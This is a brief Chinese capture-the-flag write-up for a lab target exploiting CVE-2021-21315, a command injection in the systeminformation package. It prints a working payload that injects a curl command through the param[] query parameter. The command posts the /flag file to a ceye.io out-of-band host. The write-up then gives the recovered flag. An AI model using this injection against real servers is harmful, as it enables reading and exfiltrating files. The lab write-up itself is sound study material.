春秋云镜 CVE-2021-21315 systeminformation存在命令注入

靶标介绍

systeminformation是一个简单的查询系统和OS信息包。

启动场景

漏洞利用

exp

/api/osinfo?param[]=$(curl%20-d%20@/flag%20xxx.ceye.io)

登录ceye.io平台，curl请求
http://eci-2zed871sr7xrdjb7q96l.cloudeci1.ichunqiu.com:8080/api/osinfo?param[]=$(curl%20-d%20@/flag%20xxxx.ceye.io)

查看HTTP请求, record刷新一下

得到flag

flag{94ffcf51-fdea-43e6-b60f-71dcf8cc04cb}